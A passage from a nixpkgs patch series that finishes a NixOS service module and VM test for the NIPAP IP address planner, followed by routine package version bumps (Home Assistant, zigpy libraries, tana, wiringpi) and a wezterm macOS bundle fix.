+          isSystemUser = true;
+          group = defaultUser;
+          home = dataDir;
+        };
+        users.groups."${defaultUser}" = { };
+      })
+      (lib.mkIf (cfg.nipapd.enable && cfg.nipapd.database.createLocally) {
+        services.postgresql = {
+          enable = true;
+          extensions = ps: with ps; [ ip4r ];
+          ensureUsers = [
+            {
+              name = cfg.user;
+            }
+          ];
+          ensureDatabases = [ cfg.settings.nipapd.db_name ];
+        };
+
+        systemd.services.postgresql.serviceConfig.ExecStartPost =
+          let
+            sqlFile = pkgs.writeText "nipapd-setup.sql" ''
+              CREATE EXTENSION IF NOT EXISTS ip4r;
+
+              ALTER SCHEMA public OWNER TO "${cfg.user}";
+              ALTER DATABASE "${cfg.settings.nipapd.db_name}" OWNER TO "${cfg.user}";
+            '';
+          in
+          [
+            ''
+              ${lib.getExe' config.services.postgresql.finalPackage "psql"} -d "${cfg.settings.nipapd.db_name}" -f "${sqlFile}"
+            ''
+          ];
+      })
+      (lib.mkIf cfg.nipapd.enable {
+        systemd.services.nipapd =
+          let
+            pkg = cfg.nipapd.package;
+          in
+          {
+            description = "Neat IP Address Planner";
+            after = [
+              "network.target"
+              "systemd-tmpfiles-setup.service"
+            ] ++ lib.optional (cfg.settings.nipapd.db_host == "") "postgresql.service";
+            requires = lib.optional (cfg.settings.nipapd.db_host == "") "postgresql.service";
+            wantedBy = [ "multi-user.target" ];
+            preStart = lib.optionalString (cfg.settings.auth.default_backend == defaultAuthBackend) ''
+              # Create/upgrade local auth database
+              umask 077
+              ${pkg}/bin/nipap-passwd create-database >/dev/null 2>&1
+              ${pkg}/bin/nipap-passwd upgrade-database >/dev/null 2>&1
+            '';
+            serviceConfig = defaultServiceConfig // {
+              KillSignal = "SIGINT";
+              ExecStart = ''
+                ${pkg}/bin/nipapd \
+                  --auto-install-db \
+                  --auto-upgrade-db \
+                  --foreground \
+                  --no-pid-file
+              '';
+            };
+          };
+      })
+      (lib.mkIf cfg.nipap-www.enable {
+        assertions = [
+          {
+            assertion =
+              cfg.nipap-www.xmlrpcURIFile == null -> cfg.settings.auth.default_backend == defaultAuthBackend;
+            message = "If no XMLRPC URI secret file is specified, then the default auth backend must be in use to automatically generate credentials.";
+          }
+        ];
+
+        # Ensure that _something_ exists in the [www] group.
+        services.nipap.settings.www = lib.mkDefault { };
+
+        systemd.services.nipap-www =
+          let
+            pkg = cfg.nipap-www.package;
+          in
+          {
+            description = "Neat IP Address Planner web server";
+            after = [
+              "network.target"
+              "systemd-tmpfiles-setup.service"
+            ] ++ lib.optional cfg.nipapd.enable "nipapd.service";
+            wantedBy = [ "multi-user.target" ];
+            environment = {
+              PYTHONPATH = pkg.pythonPath;
+            };
+            serviceConfig = defaultServiceConfig;
+            script =
+              let
+                bind =
+                  if cfg.nipap-www.unixSocket != null then
+                    "unix:${cfg.nipap-www.unixSocket}"
+                  else
+                    "${escapedHost cfg.nipap-www.host}:${toString cfg.nipap-www.port}";
+                generateXMLRPC = cfg.nipap-www.xmlrpcURIFile == null;
+                xmlrpcURIFile = if generateXMLRPC then "${dataDir}/www_xmlrpc_uri" else cfg.nipap-www.xmlrpcURIFile;
+              in
+              ''
+                test -f "${dataDir}/www_secret" || {
+                  umask 0077
+                  ${pkg.python}/bin/python -c "import secrets; print(secrets.token_hex())" > "${dataDir}/www_secret"
+                }
+                export FLASK_SECRET_KEY="$(cat "${dataDir}/www_secret")"
+
+                # Ensure that we have an XMLRPC URI.
+                ${
+                  if generateXMLRPC then
+                    ''
+                      test -f "${dataDir}/www_xmlrpc_uri" || {
+                        umask 0077
+                        www_password="$(${pkg.python}/bin/python -c "import secrets; print(secrets.token_hex())")"
+                        ${cfg.nipapd.package}/bin/nipap-passwd add --username nipap-www --password "''${www_password}" --name "User account for the web UI" --trusted
+
+                        echo "http://nipap-www@${defaultAuthBackend}:''${www_password}@${escapedHost cfg.settings.nipapd.listen}:${toString cfg.settings.nipapd.port}" > "${xmlrpcURIFile}"
+                      }
+                    ''
+                  else
+                    ""
+                }
+                export FLASK_XMLRPC_URI="$(cat "${xmlrpcURIFile}")"
+
+                exec "${pkg.gunicorn}/bin/gunicorn" \
+                  --preload --workers ${toString cfg.nipap-www.workers} \
+                  --pythonpath "${pkg}/${pkg.python.sitePackages}" \
+                  --bind ${bind} --umask ${cfg.nipap-www.umask} \
+                  "nipapwww:create_app()"
+              '';
+          };
+      })
+    ]
+  );
+
+  meta.maintainers = with lib.maintainers; [ lukegb ];
+}
diff --git a/pkgs/development/python-modules/flask-xml-rpc-re/default.nix b/pkgs/development/python-modules/flask-xml-rpc-re/default.nix
index ed85b18fab09..fd018de05e11 100644
--- a/pkgs/development/python-modules/flask-xml-rpc-re/default.nix
+++ b/pkgs/development/python-modules/flask-xml-rpc-re/default.nix
@@ -30,8 +30,10 @@ buildPythonPackage rec {
     nose2
   ];
 
-  checkPhase = ''
+  installCheckPhase = ''
+    runHook preInstallCheck
     nose2 -v
+    runHook postInstallCheck
   '';
 
   pythonImportsCheck = [ "flask_xmlrpcre" ];
diff --git a/pkgs/servers/sql/postgresql/ext/ip4r.nix b/pkgs/servers/sql/postgresql/ext/ip4r.nix
index 277ec10618a6..142ea551c03f 100644
--- a/pkgs/servers/sql/postgresql/ext/ip4r.nix
+++ b/pkgs/servers/sql/postgresql/ext/ip4r.nix
@@ -1,6 +1,5 @@
 {
   fetchFromGitHub,
-  gitUpdater,
   lib,
   postgresql,
   postgresqlBuildExtension,

From 9f7948fbecd670768e1372773a301d21916c6bb0 Mon Sep 17 00:00:00 2001
From: Luke Granger-Brown
Date: Sun, 22 Jun 2025 23:54:07 +0100
Subject: [PATCH 16/73] nixosTests.nipap: init nipap test

---
 nixos/tests/all-tests.nix             |  1 +
 nixos/tests/web-apps/nipap.nix        | 69 +++++++++++++++++++++++++++
 pkgs/by-name/ni/nipap-cli/package.nix |  3 ++
 pkgs/by-name/ni/nipap-www/package.nix |  2 +
 4 files changed, 75 insertions(+)
 create mode 100644 nixos/tests/web-apps/nipap.nix

diff --git a/nixos/tests/all-tests.nix b/nixos/tests/all-tests.nix
index 60d118cba38f..7ef46a25e9cb 100644
--- a/nixos/tests/all-tests.nix
+++ b/nixos/tests/all-tests.nix
@@ -938,6 +938,7 @@ in
   nginx-unix-socket = runTest ./nginx-unix-socket.nix;
   nginx-variants = import ./nginx-variants.nix { inherit pkgs runTest; };
   nifi = runTestOn [ "x86_64-linux" ] ./web-apps/nifi.nix;
+  nipap = runTest ./web-apps/nipap.nix;
   nitter = runTest ./nitter.nix;
   nix-config = runTest ./nix-config.nix;
   nix-ld = runTest ./nix-ld.nix;
diff --git a/nixos/tests/web-apps/nipap.nix b/nixos/tests/web-apps/nipap.nix
new file mode 100644
index 000000000000..bb6f77a1e9d1
--- /dev/null
+++ b/nixos/tests/web-apps/nipap.nix
@@ -0,0 +1,69 @@
+{ pkgs, lib, ... }:
+
+let
+  nipapRc = pkgs.writeText "nipaprc" ''
+    [global]
+    hostname = [::1]
+    port = 1337
+    username = nixostest
+    password = nIx0st3st
+    default_vrf_rt = -
+    default_list_vrf_rt = all
+  '';
+in
+{
+  name = "nipap";
+  meta.maintainers = [ lib.maintainers.lukegb ];
+
+  nodes.main =
+    { ... }:
+    {
+      services.nipap = {
+        enable = true;
+      };
+
+      environment.systemPackages = [
+        pkgs.nipap-cli
+      ];
+    };
+
+  testScript = ''
+    main.wait_for_unit("nipapd.service")
+    main.wait_for_unit("nipap-www.service")
+
+    # Make sure the web UI is up.
+    main.wait_for_open_port(21337)
+    main.succeed("curl -fvvv -Ls http://localhost:21337/ | grep 'NIPAP'")
+
+    # Check that none of the files we created in /var/lib/nipap are readable.
+    out = main.succeed("ls -l /var/lib/nipap")
+    bad_perms = False
+    for ln in out.split("\n"):
+        ln = ln.strip()
+        if not ln or ln.startswith('total '):
+            continue
+        if not ln.startswith('-rw------- '):
+            print(f"Bad file permissions: {ln}")
+            bad_perms = True
+    if bad_perms:
+        t.fail("One or more files were overly permissive.")
+
+    # Check we created a web-frontend user.
+    main.succeed("nipap-passwd list | grep nipap-www")
+
+    # Create a test user
+    main.succeed("nipap-passwd add -u nixostest -p nIx0st3st -n 'NixOS Test User'")
+
+    # Try to log in with it on the web frontend
+    main.succeed("curl -fvvv -Ls -b \"\" -d username=nixostest -d password=nIx0st3st http://localhost:21337/auth/login | grep 'PrefixListController'")
+
+    # Try to log in with it using the CLI
+    main.copy_from_host("${nipapRc}", "/root/.nipaprc")
+    main.succeed("chmod u=rw,go= /root/.nipaprc")
+    main.succeed("nipap address add prefix 192.0.2.0/24 type assignment description RFC1166")
+    main.succeed("nipap address add prefix 192.0.2.1/32 type host description 'test host'")
+    main.succeed("nipap address add prefix 2001:db8::/32 type reservation description RFC3849")
+    main.succeed("nipap address add prefix 2001:db8:f00f::/48 type assignment description 'eye pee vee six'")
+    main.succeed("nipap address add prefix 2001:db8:f00f:face:dead:beef:cafe:feed/128 type host description 'test host 2'")
+  '';
+}
diff --git a/pkgs/by-name/ni/nipap-cli/package.nix b/pkgs/by-name/ni/nipap-cli/package.nix
index 4568bfe13755..aeb9f33236bf 100644
--- a/pkgs/by-name/ni/nipap-cli/package.nix
+++ b/pkgs/by-name/ni/nipap-cli/package.nix
@@ -1,6 +1,7 @@
 {
   lib,
   python312Packages,
+  nixosTests,
 }:
 
 let
@@ -35,6 +36,8 @@ python3Packages.buildPythonApplication rec {
     "nipap_cli.nipap_cli"
   ];
 
+  passthru.tests.nixos = nixosTests.nipap;
+
   meta = {
     description = "Neat IP Address Planner CLI";
     longDescription = ''
diff --git a/pkgs/by-name/ni/nipap-www/package.nix b/pkgs/by-name/ni/nipap-www/package.nix
index 33355ce94a28..420c7a913da8 100644
--- a/pkgs/by-name/ni/nipap-www/package.nix
+++ b/pkgs/by-name/ni/nipap-www/package.nix
@@ -1,6 +1,7 @@
 {
   lib,
   python3Packages,
+  nixosTests,
 }:
 
 python3Packages.buildPythonApplication rec {
@@ -32,6 +33,7 @@ python3Packages.buildPythonApplication rec {
   passthru = {
     inherit (python3Packages) gunicorn python;
     pythonPath = python3Packages.makePythonPath dependencies;
+    tests.nixos = nixosTests.nipap;
   };
 
   meta = {

From a081327e235368cfc04c6cf0689dec625cdad68d Mon Sep 17 00:00:00 2001
From: Martin Weinelt
Date: Mon, 23 Jun 2025 22:53:46 +0200
Subject: [PATCH 17/73] python3Packages.aioamazondevices: 3.1.12 -> 3.1.14

https://github.com/chemelli74/aioamazondevices/blob/v3.1.14/CHANGELOG.md
---
 pkgs/development/python-modules/aioamazondevices/default.nix | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/pkgs/development/python-modules/aioamazondevices/default.nix b/pkgs/development/python-modules/aioamazondevices/default.nix
index f9c3347fffb2..ac6ed8e10565 100644
--- a/pkgs/development/python-modules/aioamazondevices/default.nix
+++ b/pkgs/development/python-modules/aioamazondevices/default.nix
@@ -16,14 +16,14 @@
 
 buildPythonPackage rec {
   pname = "aioamazondevices";
-  version = "3.1.12";
+  version = "3.1.14";
   pyproject = true;
 
   src = fetchFromGitHub {
     owner = "chemelli74";
     repo = "aioamazondevices";
     tag = "v${version}";
-    hash = "sha256-nilYImyK057/yO/pnnhM9S+vRcslLLKTsYIzGNFM2UQ=";
+    hash = "sha256-xCXzNeUIw2UxBcOMgab1lpN9/0RGLZAwgtHkZhwqxxY=";
   };
 
   build-system = [ poetry-core ];

From 9844427d4f9a5601d6a6353ca19547478213a541 Mon Sep 17 00:00:00 2001
From: Martin Weinelt
Date: Mon, 23 Jun 2025 22:55:03 +0200
Subject: [PATCH 18/73] python3Packages.aioesphomeapi: 32.2.1 -> 33.1.1

https://github.com/esphome/aioesphomeapi/releases/tag/v33.1.1
---
 pkgs/development/python-modules/aioesphomeapi/default.nix | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/pkgs/development/python-modules/aioesphomeapi/default.nix b/pkgs/development/python-modules/aioesphomeapi/default.nix
index b3c309d11b75..9aca8a3b8be2 100644
--- a/pkgs/development/python-modules/aioesphomeapi/default.nix
+++ b/pkgs/development/python-modules/aioesphomeapi/default.nix
@@ -26,7 +26,7 @@
 
 buildPythonPackage rec {
   pname = "aioesphomeapi";
-  version = "32.2.1";
+  version = "33.1.1";
   pyproject = true;
 
   disabled = pythonOlder "3.9";
@@ -35,7 +35,7 @@ buildPythonPackage rec {
     owner = "esphome";
     repo = "aioesphomeapi";
     tag = "v${version}";
-    hash = "sha256-1ZepZJdJosPPdFhx8PwArIaoz415GfA1vfc3JJ77LNo=";
+    hash = "sha256-vXBTumh1oB1vTVlX4VJvIUTnkYLG9j/8cNuHFQ2PklY=";
   };
 
   build-system = [

From 9ffbe82e18e641abe85c7e5570f42c71dbf1f1b3 Mon Sep 17 00:00:00 2001
From: "R. RyanTM"
Date: Tue, 24 Jun 2025 06:57:20 +1000
Subject: [PATCH 19/73] python3Packages.bthome-ble: 3.13.0 -> 3.13.1 (#416937)

https://github.com/bluetooth-devices/bthome-ble/blob/v3.13.1/CHANGELOG.md

Co-Authored-By: Fabian Affolter
---
 pkgs/development/python-modules/bthome-ble/default.nix | 7 ++-----
 1 file changed, 2 insertions(+), 5 deletions(-)

diff --git a/pkgs/development/python-modules/bthome-ble/default.nix b/pkgs/development/python-modules/bthome-ble/default.nix
index 15a164235268..5d9294e1b658 100644
--- a/pkgs/development/python-modules/bthome-ble/default.nix
+++ b/pkgs/development/python-modules/bthome-ble/default.nix
@@ -8,23 +8,20 @@
   poetry-core,
   pytest-cov-stub,
   pytestCheckHook,
-  pythonOlder,
   pytz,
   sensor-state-data,
 }:
 
 buildPythonPackage rec {
   pname = "bthome-ble";
-  version = "3.13.0";
+  version = "3.13.1";
   pyproject = true;
 
-  disabled = pythonOlder "3.9";
-
   src = fetchFromGitHub {
     owner = "Bluetooth-Devices";
     repo = "bthome-ble";
     tag = "v${version}";
-    hash = "sha256-e6R3Qjj82z0E+gIxqDVM08Op3KlK9ZG1iNmkqqIEjWY=";
+    hash = "sha256-oGFjWe9e386EPAJGKL8Qk55iXoyW3rXuyG7ElyQYurg=";
   };
 
   build-system = [ poetry-core ];

From b3ea12521f362a9201da2c4b506225ed743ad593 Mon Sep 17 00:00:00 2001
From: Martin Weinelt
Date: Mon, 23 Jun 2025 22:59:00 +0200
Subject: [PATCH 20/73] python3Packages.deebot-client: 13.3.0 -> 13.4.0

https://github.com/DeebotUniverse/client.py/releases/tag/13.4.0
---
 pkgs/development/python-modules/deebot-client/default.nix | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/pkgs/development/python-modules/deebot-client/default.nix b/pkgs/development/python-modules/deebot-client/default.nix
index 4b7d0bc16279..18ae5e569c1f 100644
--- a/pkgs/development/python-modules/deebot-client/default.nix
+++ b/pkgs/development/python-modules/deebot-client/default.nix
@@ -20,7 +20,7 @@
 
 buildPythonPackage rec {
   pname = "deebot-client";
-  version = "13.3.0";
+  version = "13.4.0";
   pyproject = true;
 
   disabled = pythonOlder "3.13";
@@ -29,12 +29,12 @@ buildPythonPackage rec {
     owner = "DeebotUniverse";
     repo = "client.py";
     tag = version;
-    hash = "sha256-dnh+3/viaaxlx3H0ceDH1N72kC1HBC7Szz+Gb6ryUJM=";
+    hash = "sha256-CEE6RDcYQLJ9a8QFYpCURYV8hvs0mLK8R+p68OfHKWQ=";
   };
 
   cargoDeps = rustPlatform.fetchCargoVendor {
    inherit pname version src;
-    hash = "sha256-v8FtW1gPoPfOpcxUrM7g0LKR8k0VPR13hsHCPT8uLzs=";
+    hash = "sha256-0WdRkF5UAaPQS3A9DiAe9BuqF0aAaU0c2C0BU3Ue4n0=";
   };
 
   pythonRelaxDeps = [

From 8798c7d006ff932da93782f8dfd2dd1572f7e9d4 Mon Sep 17 00:00:00 2001
From: Martin Weinelt
Date: Mon, 23 Jun 2025 22:59:56 +0200
Subject: [PATCH 21/73] python3Packages.homematicip: 2.0.5 -> 2.0.6

https://github.com/hahn-th/homematicip-rest-api/releases/tag/2.0.6
---
 pkgs/development/python-modules/homematicip/default.nix | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/pkgs/development/python-modules/homematicip/default.nix b/pkgs/development/python-modules/homematicip/default.nix
index fb1feb4dc972..86f9eadefbe9 100644
--- a/pkgs/development/python-modules/homematicip/default.nix
+++ b/pkgs/development/python-modules/homematicip/default.nix
@@ -16,7 +16,7 @@
 
 buildPythonPackage rec {
   pname = "homematicip";
-  version = "2.0.5";
+  version = "2.0.6";
   pyproject = true;
 
   disabled = pythonOlder "3.12";
@@ -25,7 +25,7 @@ buildPythonPackage rec {
     owner = "hahn-th";
     repo = "homematicip-rest-api";
     tag = version;
-    hash = "sha256-WvE5JTpAjRGLP7haIwD5hKOvz3hM7paV2jyds/yCxg8=";
+    hash = "sha256-HV+4ZmYr6LsSBbQnr4PUD2u0y6uWxuCMUgNh7gG9IH8=";
   };
 
   build-system = [

From 24b5437818010d3fa52902f353815d950bd12b03 Mon Sep 17 00:00:00 2001
From: Martin Weinelt
Date: Mon, 23 Jun 2025 23:00:21 +0200
Subject: [PATCH 22/73] python3Packages.zigpy-zigate: 0.13.2 -> 0.13.3

https://github.com/zigpy/zigpy-zigate/releases/tag/0.13.3
---
 pkgs/development/python-modules/zigpy-zigate/default.nix | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/pkgs/development/python-modules/zigpy-zigate/default.nix b/pkgs/development/python-modules/zigpy-zigate/default.nix
index 589178993688..9cb5c4f4b1ab 100644
--- a/pkgs/development/python-modules/zigpy-zigate/default.nix
+++ b/pkgs/development/python-modules/zigpy-zigate/default.nix
@@ -16,7 +16,7 @@
 
 buildPythonPackage rec {
   pname = "zigpy-zigate";
-  version = "0.13.2";
+  version = "0.13.3";
   pyproject = true;
 
   disabled = pythonOlder "3.8";
@@ -25,7 +25,7 @@ buildPythonPackage rec {
     owner = "zigpy";
     repo = "zigpy-zigate";
     tag = version;
-    hash = "sha256-MlAX7dcRZziMYCpG64OemZ8czwvDXpdoRaDVo1sUCno=";
+    hash = "sha256-reOt0bPPkKDKeu8CESJtLDEmpkOmgopXk65BqBlBIhY=";
   };
 
   postPatch = ''

From 624c224795906207ba12de0a9c748ae8375a70f0 Mon Sep 17 00:00:00 2001
From: Martin Weinelt
Date: Mon, 23 Jun 2025 23:02:29 +0200
Subject: [PATCH 23/73] python3Packages.zigpy-znp: 0.14.0 -> 0.14.1

https://github.com/zigpy/zigpy-znp/releases/tag/v0.14.1
---
 pkgs/development/python-modules/zigpy-znp/default.nix | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/pkgs/development/python-modules/zigpy-znp/default.nix b/pkgs/development/python-modules/zigpy-znp/default.nix
index d78132440c01..9be00b700a20 100644
--- a/pkgs/development/python-modules/zigpy-znp/default.nix
+++ b/pkgs/development/python-modules/zigpy-znp/default.nix
@@ -19,7 +19,7 @@
 
 buildPythonPackage rec {
   pname = "zigpy-znp";
-  version = "0.14.0";
+  version = "0.14.1";
   pyproject = true;
 
   disabled = pythonOlder "3.7";
@@ -28,7 +28,7 @@ buildPythonPackage rec {
     owner = "zigpy";
     repo = "zigpy-znp";
     tag = "v${version}";
-    hash = "sha256-vYB04vEFqpqrjJMS73mtYXakp7lEIJjB+tT0SF9hpWM=";
+    hash = "sha256-V662zDUBMbr+cARxrwt8196Ml4zlGEAudR3BtvY96HM=";
   };
 
   postPatch = ''

From ab39869328248d4dae26cee94e7c0c8b9390adf3 Mon Sep 17 00:00:00 2001
From: Martin Weinelt
Date: Mon, 23 Jun 2025 23:06:34 +0200
Subject: [PATCH 24/73] python3Packages.zha: 0.0.59 -> 0.0.60

https://github.com/zigpy/zha/releases/tag/0.0.60
---
 pkgs/development/python-modules/zha/default.nix | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/pkgs/development/python-modules/zha/default.nix b/pkgs/development/python-modules/zha/default.nix
index 8395428be649..ef17ff74e575 100644
--- a/pkgs/development/python-modules/zha/default.nix
+++ b/pkgs/development/python-modules/zha/default.nix
@@ -27,7 +27,7 @@
 
 buildPythonPackage rec {
   pname = "zha";
-  version = "0.0.59";
+  version = "0.0.60";
   pyproject = true;
 
   disabled = pythonOlder "3.12";
@@ -36,7 +36,7 @@ buildPythonPackage rec {
     owner = "zigpy";
     repo = "zha";
     tag = version;
-    hash = "sha256-wddMeXFKk8HBz8Hle5kbRaOkZLOr98HoiHYYlBtuxSA=";
+    hash = "sha256-Bx6JcVKosf6wXe+LRP9R4iFAva/rJ15JhYchCx2CbJk=";
   };
 
   postPatch = ''

From 1b7c6b61801ad5f2ebff2a2676cd0176d3418463 Mon Sep 17 00:00:00 2001
From: Martin Weinelt
Date: Mon, 23 Jun 2025 23:06:40 +0200
Subject: [PATCH 25/73] home-assistant: 2025.6.1 -> 2025.6.2

https://github.com/home-assistant/core/releases/tag/2025.6.2
---
 pkgs/servers/home-assistant/component-packages.nix | 2 +-
 pkgs/servers/home-assistant/default.nix            | 6 +++---
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/pkgs/servers/home-assistant/component-packages.nix b/pkgs/servers/home-assistant/component-packages.nix
index 0617231f1378..a30b759c63f0 100644
--- a/pkgs/servers/home-assistant/component-packages.nix
+++ b/pkgs/servers/home-assistant/component-packages.nix
@@ -2,7 +2,7 @@
 # Do not edit!
 
 {
-  version = "2025.6.1";
+  version = "2025.6.2";
   components = {
     "3_day_blinds" = ps: with ps; [
     ];
diff --git a/pkgs/servers/home-assistant/default.nix b/pkgs/servers/home-assistant/default.nix
index 3fffe4a6faa1..2d2b22448073 100644
--- a/pkgs/servers/home-assistant/default.nix
+++ b/pkgs/servers/home-assistant/default.nix
@@ -386,7 +386,7 @@ let
   extraBuildInputs = extraPackages python.pkgs;
 
   # Don't forget to run update-component-packages.py after updating
-  hassVersion = "2025.6.1";
+  hassVersion = "2025.6.2";
 in
 
 python.pkgs.buildPythonApplication rec {
@@ -407,13 +407,13 @@ python.pkgs.buildPythonApplication rec {
     owner = "home-assistant";
     repo = "core";
     tag = version;
-    hash = "sha256-Pp2IIpVfzYE4BBJEq4Ll2s0vgsqxAApE8TmVd1zAg38=";
+    hash = "sha256-5+L687sUD+e8F9UYnFURSUMG2/USuOpNu5a9By0yZ/g=";
   };
 
   # Secondary source is pypi sdist for translations
   sdist = fetchPypi {
     inherit pname version;
-    hash = "sha256-yc4tEyR3xpo4x9daWEwXFJBhSH3xeOc2ckO+7LWVRlA=";
+    hash = "sha256-DLqP9/b68ikGuxrvFiJCqguE2WgnKP0HtiU2X7tUbkE=";
   };
 
   build-system = with python.pkgs; [

From 42271f3d95ddd75ac76088dbae63e7f651939fb0 Mon Sep 17 00:00:00 2001
From: "R. Ryantm"
Date: Mon, 23 Jun 2025 22:26:05 +0000
Subject: [PATCH 26/73] tana: 1.0.32 -> 1.0.36

---
 pkgs/by-name/ta/tana/package.nix | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/pkgs/by-name/ta/tana/package.nix b/pkgs/by-name/ta/tana/package.nix
index 8a1e3fde0b85..4f8600066f06 100644
--- a/pkgs/by-name/ta/tana/package.nix
+++ b/pkgs/by-name/ta/tana/package.nix
@@ -62,7 +62,7 @@ let
     stdenv.cc.cc
     stdenv.cc.libc
   ];
-  version = "1.0.32";
+  version = "1.0.36";
 in
 stdenv.mkDerivation {
   pname = "tana";
@@ -70,7 +70,7 @@ stdenv.mkDerivation {
 
   src = fetchurl {
     url = "https://github.com/tanainc/tana-desktop-releases/releases/download/v${version}/tana_${version}_amd64.deb";
-    hash = "sha256-oAW9Vx4z0TOweKA6bsmCm7DY72pFWBnPLG0dS05oCw8=";
+    hash = "sha256-dDB2RcTk58IQGqNGepaIvxGhR0/soWWDbBXxnSEYkdw=";
   };
 
   nativeBuildInputs = [

From dbf79155e6046e7a80e6c37fe1551ad7cab669de Mon Sep 17 00:00:00 2001
From: "R. Ryantm"
Date: Mon, 23 Jun 2025 23:06:41 +0000
Subject: [PATCH 27/73] supermariowar: 2024-unstable-2025-04-03 -> 2024-unstable-2025-06-18

---
 pkgs/by-name/su/supermariowar/package.nix | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/pkgs/by-name/su/supermariowar/package.nix b/pkgs/by-name/su/supermariowar/package.nix
index d98c9d6f6909..507b94324f89 100644
--- a/pkgs/by-name/su/supermariowar/package.nix
+++ b/pkgs/by-name/su/supermariowar/package.nix
@@ -16,13 +16,13 @@
 
 stdenv.mkDerivation (finalAttrs: {
   pname = "supermariowar";
-  version = "2024-unstable-2025-04-03";
+  version = "2024-unstable-2025-06-18";
 
   src = fetchFromGitHub {
     owner = "mmatyas";
     repo = "supermariowar";
-    rev = "c0ed774a2415ad45e72bd6086add2a5cbfc88898";
-    hash = "sha256-vh8SSMxAOG8f9nyJmKUlA8yb+G61Bfc62dhB2eLdo20=";
+    rev = "71383b07b99a52b57be79cf371ab718337365019";
+    hash = "sha256-PjweE8cGAp8V4LY0/6QzLekQ80Q1qbwDiiSzDirA29s=";
     fetchSubmodules = true;
   };
 

From c50af17f7852ce82d8d3984d659ce34820e1fed8 Mon Sep 17 00:00:00 2001
From: Marco Bulgarini
Date: Tue, 24 Jun 2025 06:04:24 +0200
Subject: [PATCH 28/73] wezterm: fix app bundle on darwin

Signed-off-by: Marco Bulgarini
Co-authored-by: Sizhe Zhao
---
 pkgs/by-name/we/wezterm/package.nix | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/pkgs/by-name/we/wezterm/package.nix b/pkgs/by-name/we/wezterm/package.nix
index 118a02e2c6b8..22d85651a88e 100644
--- a/pkgs/by-name/we/wezterm/package.nix
+++ b/pkgs/by-name/we/wezterm/package.nix
@@ -119,7 +119,12 @@ rustPlatform.buildRustPackage rec {
     cp -r assets/macos/WezTerm.app "$OUT_APP"
     rm $OUT_APP/*.dylib
     cp -r assets/shell-integration/* "$OUT_APP"
-    ln -s $out/bin/{wezterm,wezterm-mux-server,wezterm-gui,strip-ansi-escapes} "$OUT_APP"
+    # https://github.com/wezterm/wezterm/pull/6886
+    # macOS will only recognize our application bundle
+    # if the binaries are inside of it. Move them there
+    # and create symbolic links for them in bin/.
+    mv $out/bin/{wezterm,wezterm-mux-server,wezterm-gui,strip-ansi-escapes} "$OUT_APP"
+    ln -s "$OUT_APP"/{wezterm,wezterm-mux-server,wezterm-gui,strip-ansi-escapes} "$out/bin"
   '';
 
   passthru = {

From ef105f441abeced5abb65ceca7f9daed94371485 Mon Sep 17 00:00:00 2001
From: "R. Ryantm"
Date: Tue, 24 Jun 2025 05:21:06 +0000
Subject: [PATCH 29/73] nelm: 1.6.0 -> 1.7.0

---
 pkgs/by-name/ne/nelm/package.nix | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/pkgs/by-name/ne/nelm/package.nix b/pkgs/by-name/ne/nelm/package.nix
index d976ad036d6d..38af6902694b 100644
--- a/pkgs/by-name/ne/nelm/package.nix
+++ b/pkgs/by-name/ne/nelm/package.nix
@@ -9,13 +9,13 @@
 }:
 buildGoModule (finalAttrs: {
   pname = "nelm";
-  version = "1.6.0";
+  version = "1.7.0";
 
   src = fetchFromGitHub {
     owner = "werf";
     repo = "nelm";
     tag = "v${finalAttrs.version}";
-    hash = "sha256-bqVas9zF/xtL5K/7cOF/4q4weZtEBhfB5ngdAq0ZfjI=";
+    hash = "sha256-XAieAxfpNi2XpjG8lyatAqP13wicx3JFjckgSmiKqjA=";
   };
 
   vendorHash = "sha256-bx8e5jV+ORnJg/35VwO7qodFjmSf7XbzTKZKp3b8hqc=";

From 083009d87284ebc4d90672534356fb7d66c9cff5 Mon Sep 17 00:00:00 2001
From: James Ward
Date: Tue, 24 Jun 2025 00:27:19 -0600
Subject: [PATCH 30/73] maintainers/team-list: jetbrains add jamesward

---
 maintainers/team-list.nix | 1 +
 1 file changed, 1 insertion(+)

diff --git a/maintainers/team-list.nix b/maintainers/team-list.nix
index bdde7f2f5d41..0696cca7818b 100644
--- a/maintainers/team-list.nix
+++ b/maintainers/team-list.nix
@@ -630,6 +630,7 @@ with lib.maintainers;
       leona
      theCapypara
       thiagokokada
+      jamesward
    ];
    shortName = "Jetbrains";
    scope = "Maintainers of the Jetbrains IDEs in nixpkgs";

From a6e883907839ef0543d7b870a5d7346584a45889 Mon Sep 17 00:00:00 2001
From: Ryan Omasta
Date: Tue, 24 Jun 2025 00:43:12 -0600
Subject: [PATCH 31/73] wiringpi: 3.10 -> 3.16

https://github.com/WiringPi/WiringPi/releases/tag/3.16

Diff: https://github.com/WiringPi/WiringPi/compare/3.10...3.16
---
 pkgs/by-name/wi/wiringpi/package.nix | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/pkgs/by-name/wi/wiringpi/package.nix b/pkgs/by-name/wi/wiringpi/package.nix
index 57d72b67bcbf..b57e32c5d1c5 100644
--- a/pkgs/by-name/wi/wiringpi/package.nix
+++ b/pkgs/by-name/wi/wiringpi/package.nix
@@ -7,12 +7,12 @@
 }:
 
 let
-  version = "3.10";
+  version = "3.16";
   srcAll = fetchFromGitHub {
     owner = "WiringPi";
     repo = "WiringPi";
-    rev = version;
-    sha256 = "sha256-OWR+yo+SnYaMd8J+ku9ettZi+rDHcHlGZCoucCiRkCI=";
+    tag = version;
+    hash = "sha256-NBHmRA+6Os6/IpW8behbgpVjtN8QF9gkffXU2ZVC8ts=";
   };
 
   mkSubProject = {

From 8976f8ad3ba71ea5eaa3ca0dfd39e5b9e1500484 Mon Sep 17 00:00:00 2001
From: Ryan Omasta
Date: Tue, 24 Jun 2025 00:45:05 -0600
